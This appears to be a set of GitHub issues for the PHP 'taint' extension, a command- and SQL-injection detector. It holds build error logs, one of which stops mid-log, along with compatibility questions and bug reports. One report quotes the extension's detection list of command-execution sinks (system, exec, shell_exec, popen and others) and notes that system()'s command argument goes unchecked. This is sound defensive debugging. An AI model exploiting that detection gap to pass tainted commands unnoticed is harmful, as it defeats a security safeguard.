ext\taint\taint.c(919): warning C4024: 'php_taint_binary_assign_op_obj_helper': different t
ypes for formal and actual parameter 1
ext\taint\taint.c(970): warning C4018: '<': signed/unsigned mismatch
NMAKE : fatal error U1077: '"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\cl.
exe"' : return code '0x2'
Stop.

Can this dev version work on php 5.4.0+

try to install with pecl taint 1.2.1 that not support php 5.4

Do Taint not support php5.6?

My testing environment: php5.6 + mysql + nginx. I constructed the "EasyTalk" website in it and added taint extension to php, it is invalid that I request the web page. The problem is in php_taint_send_var_handler and php_taint_assign_handle function.
@laruence

conflict with xdebug?

Hi Laurence,

This is an awesome extension, thanks so much for developing this!

I detected a conflict between xdebug and php-taint, and developed a little test-case:

$a = $_GET['test'];

$b = " " . $a; // this is where $b loses it's taint with xdebug

if (is_tainted($b)) {
  echo "without xdebug I go here"
} else {
  echo "with xdebug i go here";
}

I am not sure if this is a problem of xdebug or php-taint.

To avoid false-negatives, maybe php-taint can include a warning if it is running together with xdebug?

Keep up the great work!
Joost

User registered opcode handler should call ones already set by other extensions

The taint extension marks a conflict with Xdebug.

This extension registers an opcode handler. This handler currently returns the ZEND_USER_OPCODE_DISPATCH value which means that the Zend engine users its internal implementation to further handle that opcode. If however another extension (such as Xdebug) has also overridden the opcode, its handler will not be called.

Make sure to remember already set handlers, and then call these if they're not NULL, and otherwise continue returning ZEND_USER_OPCODE_DISPATCH.

taint/taint.c

Line 1225 in 4a6c4cb

static void php_taint_register_handlers() /* {{{ */ {

See also https://bugs.xdebug.org/1759, which I've recently fixed.

taint对PDO的检测是不起作用的

taint中对PDO的检测并不起作用，发现原因是PHP中PDO的类名是大写的PDO，在进行类的判断时使用了小写的pdo，导致判断不起作用。另外mysqli中缺少对prepare语句的判断，虽大大部分情况是没有问题的，但如果个别参数还是用了嵌入的方式还是存在问题。希望下个版本中能够修复这个问题，谢谢！

String slashes bug

Hi,
I've only just started playing with this extension and I'm not familiar enough with how it works yet to properly triage this so apologies for being kind of vague!

I have enabled the extension on PHP 7 on Ubuntu 14.10 with 'pecl install taint-beta'.

When it's enabled, it seems to be doing something strange to strings containing slashes. For example if I run Wordpress, I get errors such as the following:

[Fri Jan 29 13:00:54.852696 2016] [:error] [pid 20226] [client :3850] PHP Warning: require(var/www/html/wp/wp-content/plugins/bbpress/includes/core/sub-actions.php)

There should be a leading '/' on this path, but it has disappeared. Also, sometimes I get redirected to paths which should contain slashes and don't, for example it will sometimes redirect me to '/wp-adminsomepage' instead of 'wp-admin/somepage'.

However, if I disable taint in php.ini, these problems immediately disappear and everything is fine.

Does this ring any bells for anyone more familiar with the codebase as to anything taint may be doing to cause this?

The sensitive parameter of some sinks are incorrect

ex：

else if (zend_string_equals_literal(fname, "passthru") ||
				zend_string_equals_literal(fname, "system") ||
				zend_string_equals_literal(fname, "exec") ||
				zend_string_equals_literal(fname, "shell_exec") ||
				zend_string_equals_literal(fname, "proc_open") ||
				zend_string_equals_literal(fname, "popen")) {
			zval *cmd = ZEND_CALL_ARG(ex, arg_count);
			if (IS_STRING == Z_TYPE_P(cmd) && TAINT_POSSIBLE(Z_STR_P(cmd))) {
				php_taint_error(ZSTR_VAL(fname), "CMD statement contains data that might be tainted");
			}
		}

the param of cmd string is the last param in these function call,but the system del:

system ( string $command [, int &$return_var ] ) : string

so if i set the 2nd param of system, the taint will ignore the first param that actually cmd string.

Windows PHP-SDK PECL Build Error: Could not find rc file because of credit string that contain "<" & ">"

Abstract(English)

Credit string has email string surrounded by "<" AND ">". When nmake executing Microsoft Windows Resource Compiler(rc), these will break the command and rc will return 0x1, saying "The System Could Not Find The File Specified". The whole compile process will fail, nmake output "fatal error U1077".

Not sure whether the bug should be assigned to PHP-SDK or taint extension.

（中文）问题详述

Taint的Credit部分含有"<"以及">"字符。按照官方PHP-SDK和教程（https://wiki.php.net/internals/windows/stepbystepbuild ）进行PECL编译时，nmake执行到Microsoft Windows Resource Compiler(rc)阶段，会出现命令行被截断现象，导致返回0x1，报“系统找不到指定的文件。”。整个编译过程失败，nmake报 "fatal error U1077"。

这个bug，不知道应该是属于PHP-SDK的bug还是taint扩展的Credit属性写得有问题。

编译环境

Windows XP SP3 x86
Windows SDK 6.1
Visual C++ Express 2008 SP1

待编译内容

PHP 5.3.29 NTS VC9 x86
PHP Taint 1.2.2 For PHP 5.3.29 NTS VC9 x86 (https://pecl.php.net/package/taint)

重现步骤

1、按照官方PHP-SDK和教程（https://wiki.php.net/internals/windows/stepbystepbuild ）中的“Adding PECL extensions”进行PECL编译。但configure命令行换成：

configure --disable-all --enable-cli --enable-cgi --enable-taint=shared

2、执行nmake

预期结果

编译成功

故障结果

rc返回0x1，报“系统找不到指定的文件。”。整个编译过程失败，nmake报 "fatal error U1077"。

   正在创建库 Release\php5.lib 和对象 Release\php5.exp
        rc /n /fo Release\php_taint.dll.res /d FILE_DESCRIPTION="\"taint\"" /d F
ILE_NAME="\"php_taint.dll\"" /d URL="\"http://pecl.php.net/taint\"" /d INTERNAL_
NAME="\"TAINT extension\"" /d EXT_FILE_VERSION=1,2,2 /d EXT_VERSION="\"1.2.2\""
/d THANKS_GUYS="\"Thanks to Xinchen Hui <[email protected]>\"" win32\build\templa
te.rc
系统找不到指定的文件。
NMAKE : fatal error U1077: “rc”: 返回代码“0x1”
Stop.

当前缓解/变通方法

configure完毕后，修改Makefile和Makefile.objects，把THANKS_GUYS=内的"<"以及">"分别换成“(”和“)”。

taint.c

在 php_assign_handler() php_assign_ref_handler()两个函数里面，处理OP2的时候，都出现了TAINT_CV_DEF_OF(TAINT_OP1_VAR(opline)). [LINE 1932, LINE2009]
应该是TAINT_CV_DEF_OF(TAINT_OP2_VAR(opline)).

Does this support backward taint analysis ?

I am always looking for a debugger that supports system-wide taint analysis.but I only found free tools like panda.Unfortunately, its performance is too bad.When I run some large software in the vm, the whole system is very slow, I can't debug it at all.Finally I found a commercial tool. It is called tetrane.But I asked some people, they said that this tool is not as high-performance as it is advertised.I don't know if there is a debugger that supports full-system taint analysis on the market, and if you run Firefox, the system won't slow down.In addition, I am looking for an open source project, which is implemented by c or c++, and it support forward and backward taint analysis.I found an open source ida plugin. It's called bincat, but it's not c language, I studied it for a few days, headache, and couldn't understand.If you know any information, please let me know, thank you.

taintmark should track individual entries in arrays

otherwise, if you do

$params['a'] = 'a';
$params['b'] = $_GET['b'];
...
$params['z'] = 'z';

the whole of $params is tainted.

php7.0.5安装报错

pecl/taint requires PHP (version >= 5.2.0, version <= 5.4.99), installed version is 7.0.5

make error at php5.5.9 ubuntu 14.04LTS

Error message:
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:60:3: error: #error "Unsupported PHP Version ID:" PHP_VERSION_ID

error "Unsupported PHP Version ID:" PHP_VERSION_ID

^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_make_real_object':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:116:36: error: 'IS_FALSE' undeclared (first use in this function)
if (EXPECTED(Z_TYPE_P(object) <= IS_FALSE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'

define EXPECTED(condition) __builtin_expect(condition, 1)

/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:116:36: note: each undeclared identifier is reported only once for each function it appears in
if (EXPECTED(Z_TYPE_P(object) <= IS_FALSE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'

define EXPECTED(condition) __builtin_expect(condition, 1)

/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: At top level:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:130:1: error: unknown type name 'zend_long'
static zend_long php_taint_check_string_offset(zval dim, int type) / {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_check_string_offset':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:131:2: error: unknown type name 'zend_long'
zend_long offset;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:146:9: error: 'IS_FALSE' undeclared (first use in this function)
case IS_FALSE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:147:9: error: 'IS_TRUE' undeclared (first use in this function)
case IS_TRUE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:150:9: error: 'IS_REFERENCE' undeclared (first use in this function)
case IS_REFERENCE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:151:9: warning: assignment makes pointer from integer without a cast [enabled by default]
dim = Z_REFVAL_P(dim);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fetch_dimension_address_inner':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:169:2: error: unknown type name 'zend_string'
zend_string *offset_key;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:176:3: error: too few arguments to function 'zend_hash_index_find'
retval = zend_hash_index_find(ht, hval);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:180:47: error: expected ')' before 'ZEND_LONG_FMT'
zend_error(E_NOTICE,"Undefined offset: " ZEND_LONG_FMT, hval);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:187:47: error: expected ')' before 'ZEND_LONG_FMT'
zend_error(E_NOTICE,"Undefined offset: " ZEND_LONG_FMT, hval);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:190:13: warning: assignment makes pointer from integer without a cast [enabled by default]
retval = zend_hash_index_add_new(ht, hval, &EG(uninitialized_zval));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:195:14: warning: assignment makes pointer from integer without a cast [enabled by default]
offset_key = Z_STR_P(dim);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:197:44: error: macro "ZEND_HANDLE_NUMERIC" requires 3 arguments, but only 2 given
if (ZEND_HANDLE_NUMERIC(offset_key, hval)) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:197:8: error: 'ZEND_HANDLE_NUMERIC' undeclared (first use in this function)
if (ZEND_HANDLE_NUMERIC(offset_key, hval)) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:202:3: warning: passing argument 2 of 'zend_hash_find' from incompatible pointer type [enabled by default]
retval = zend_hash_find(ht, offset_key);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:164:14: note: expected 'const char *' but argument is of type 'int *'
ZEND_API int zend_hash_find(const HashTable *ht, const char *arKey, uint nKeyLength, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:202:3: error: too few arguments to function 'zend_hash_find'
retval = zend_hash_find(ht, offset_key);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:164:14: note: declared here
ZEND_API int zend_hash_find(const HashTable *ht, const char *arKey, uint nKeyLength, void **pData);
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:205:39: error: 'IS_INDIRECT' undeclared (first use in this function)
if (UNEXPECTED(Z_TYPE_P(retval) == IS_INDIRECT)) {
^
/usr/include/php5/Zend/zend.h:390:49: note: in definition of macro 'UNEXPECTED'

define UNEXPECTED(condition) __builtin_expect(condition, 0)

/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:206:12: warning: assignment makes pointer from integer without a cast [enabled by default]
retval = Z_INDIRECT_P(retval);
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:207:40: error: 'IS_UNDEF' undeclared (first use in this function)
if (UNEXPECTED(Z_TYPE_P(retval) == IS_UNDEF)) {
^
/usr/include/php5/Zend/zend.h:390:49: note: in definition of macro 'UNEXPECTED'

define UNEXPECTED(condition) __builtin_expect(condition, 0)

/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:210:8: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:217:8: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE,"Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:228:6: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:235:6: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE,"Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:238:13: warning: assignment makes pointer from integer without a cast [enabled by default]
retval = zend_hash_add_new(ht, offset_key, &EG(uninitialized_zval));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:245:16: warning: assignment makes pointer from integer without a cast [enabled by default]
offset_key = ZSTR_EMPTY_ALLOC();
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:251:5: warning: format '%p' expects argument of type 'void *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Resource ID#%pd used as offset, casting to integer (%pd)", Z_RES_HANDLE_P(dim), Z_RES_HANDLE_P(dim));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:251:5: warning: format '%p' expects argument of type 'void *', but argument 4 has type 'int' [-Wformat=]
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:254:9: error: 'IS_FALSE' undeclared (first use in this function)
case IS_FALSE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:257:9: error: 'IS_TRUE' undeclared (first use in this function)
case IS_TRUE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:260:9: error: 'IS_REFERENCE' undeclared (first use in this function)
case IS_REFERENCE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:261:9: warning: assignment makes pointer from integer without a cast [enabled by default]
dim = Z_REFVAL_P(dim);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fetch_dimension_address':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:286:87: error: macro "zend_hash_next_index_insert" requires 4 arguments, but only 2 given
retval = zend_hash_next_index_insert(Z_ARRVAL_P(container), &EG(uninitialized_zval));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:286:13: error: 'zend_hash_next_index_insert' undeclared (first use in this function)
retval = zend_hash_next_index_insert(Z_ARRVAL_P(container), &EG(uninitialized_zval));
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:301:45: error: 'IS_REFERENCE' undeclared (first use in this function)
} else if (EXPECTED(Z_TYPE_P(container) == IS_REFERENCE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'

define EXPECTED(condition) __builtin_expect(condition, 1)

/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:302:13: warning: assignment makes pointer from integer without a cast [enabled by default]
container = Z_REFVAL_P(container);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:340:4: error: too many arguments to function 'container->value.obj.handlers->read_dimension'
retval = Z_OBJ_HT_P(container)->read_dimension(container, dim, type, result);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:346:5: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Indirect modification of overloaded element of %s has no effect", ZSTR_VAL(ce->name));
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:347:54: error: 'IS_UNDEF' undeclared (first use in this function)
} else if (EXPECTED(retval && Z_TYPE_P(retval) != IS_UNDEF)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'

define EXPECTED(condition) __builtin_expect(condition, 1)

/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:362:7: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Indirect modification of overloaded element of %s has no effect", ZSTR_VAL(ce->name));
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:378:45: error: 'IS_FALSE' undeclared (first use in this function)
} else if (EXPECTED(Z_TYPE_P(container) <= IS_FALSE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'

define EXPECTED(condition) __builtin_expect(condition, 1)

/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_assign_op_overloaded_property':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:416:3: warning: passing argument 4 of 'obj.value.obj.handlers->read_property' from incompatible pointer type [enabled by default]
(z = Z_OBJ_HT(obj)->read_property(&obj, property, BP_VAR_R, cache_slot, &rv)) != NULL) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:416:3: note: expected 'const struct _zend_literal *' but argument is of type 'void **'
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:416:3: error: too many arguments to function 'obj.value.obj.handlers->read_property'
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:423:4: error: too many arguments to function 'z->value.obj.handlers->get'
zval *value = Z_OBJ_HT_P(z)->get(z, &rv2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:426:5: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&rv);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:439:3: warning: passing argument 4 of 'obj.value.obj.handlers->write_property' from incompatible pointer type [enabled by default]
Z_OBJ_HT(obj)->write_property(&obj, property, z, cache_slot);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:439:3: note: expected 'const struct _zend_literal *' but argument is of type 'void **'
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:444:4: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(z));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:446:3: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(zptr);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_obj_dim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:463:3: error: too many arguments to function 'object->value.obj.handlers->read_dimension'
(z = Z_OBJ_HT_P(object)->read_dimension(object, property, BP_VAR_R, &rv)) != NULL) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:467:4: error: too many arguments to function 'z->value.obj.handlers->get'
zval *value = Z_OBJ_HT_P(z)->get(z, &rv2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:470:5: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&rv);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval '
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:475:20: error: 'IS_REFERENCE' undeclared (first use in this function)
(Z_TYPE_P(z) == IS_REFERENCE && IS_STRING == Z_TYPE_P(Z_REFVAL_P(z)) &&
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_operators.h:486:33: error: invalid type argument of unary '' (have 'int')
#define Z_TYPE_P(zval_p) Z_TYPE(*zval_p)
^
/usr/include/php5/Zend/zend_operators.h:485:24: note: in definition of macro 'Z_TYPE'
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:475:49: note: in expansion of macro 'Z_TYPE_P'
(Z_TYPE_P(z) == IS_REFERENCE && IS_STRING == Z_TYPE_P(Z_REFVAL_P(z)) &&
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:482:48: warning: pointer/integer type mismatch in conditional expression [enabled by default]
binary_op(&res, Z_ISREF_P(z) ? Z_REFVAL_P(z) : z, value);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:485:4: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&rv);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:491:4: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR(res));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:493:3: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&res);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: At top level:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:504:36: error: unknown type name 'zend_array'
static void php_taint_mark_strings(zend_array symbol_table) / {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:516:77: error: unknown type name 'uint32_t'
static zval *php_taint_get_zval_ptr_tmpvar(zend_execute_data *execute_data, uint32_t var, zend_free_op should_free) / {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:532:73: error: unknown type name 'uint32_t'
static zval *php_taint_get_zval_ptr_cv(zend_execute_data execute_data, uint32_t var, int type, int force_ret) / {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_get_zval_ptr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:562:3: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_tmpvar(execute_data, op.var, should_free);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:566:4: warning: return makes pointer from integer without a cast [enabled by default]
return EX_CONSTANT(op);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:568:4: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_cv(execute_data, op.var, type, force_ret);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: At top level:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:576:78: error: unknown type name 'uint32_t'
static zval *php_taint_get_zval_ptr_ptr_var(zend_execute_data *execute_data, uint32_t var, zend_free_op should_free) / {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_get_zval_ptr_ptr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:592:3: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_cv(execute_data, op.var, type, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:595:3: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_ptr_var(execute_data, op.var, should_free);
^
In file included from /usr/include/php5/Zend/zend_modules.h:26:0,
from /usr/include/php5/Zend/zend_API.h:26,
from /usr/include/php5/main/php.h:39,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_compile.h:402:33: error: request for member 'This' in something not a structure or union
#define EX(element) execute_data.element
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:598:11: note: in expansion of macro 'EX'
return &EX(This);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_error':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:613:2: warning: format not a string literal and no format arguments [-Wformat-security]
zend_error(TAINT_G(error_level), msg);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_init_dynamic_fcall_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:663:4: error: too few arguments to function 'zend_hash_index_find'
zval *cname = zend_hash_index_find(Z_ARRVAL_P(op2), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:664:4: error: too few arguments to function 'zend_hash_index_find'
zval *mname = zend_hash_index_find(Z_ARRVAL_P(op2), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_rope_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:710:2: error: unknown type name 'zend_string'
zend_string **rope;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:715:10: error: 'zend_string' undeclared (first use in this function)
rope = (zend_string **)EX_VAR(opline->op1.var);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:715:24: error: expected expression before ')' token
rope = (zend_string **)EX_VAR(opline->op1.var);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:717:9: warning: assignment makes pointer from integer without a cast [enabled by default]
result = EX_VAR(opline->result.var);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:719:31: warning: assignment makes pointer from integer without a cast [enabled by default]
rope[opline->extended_value] = zval_get_string(op2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:732:3: warning: passing argument 2 of 'memcpy' makes pointer from integer without a cast [enabled by default]
memcpy(target, ZSTR_VAL(rope[i]), ZSTR_LEN(rope[i]));
^
In file included from /usr/include/features.h:374:0,
from /usr/include/stdlib.h:24,
from /usr/include/php5/main/php_config.h:2418,
from /usr/include/php5/main/php.h:33,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/x86_64-linux-gnu/bits/string3.h:48:1: note: expected 'const void * restrict' but argument is of type 'int'
__NTH (memcpy (void *__restrict __dest, const void __restrict __src,
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
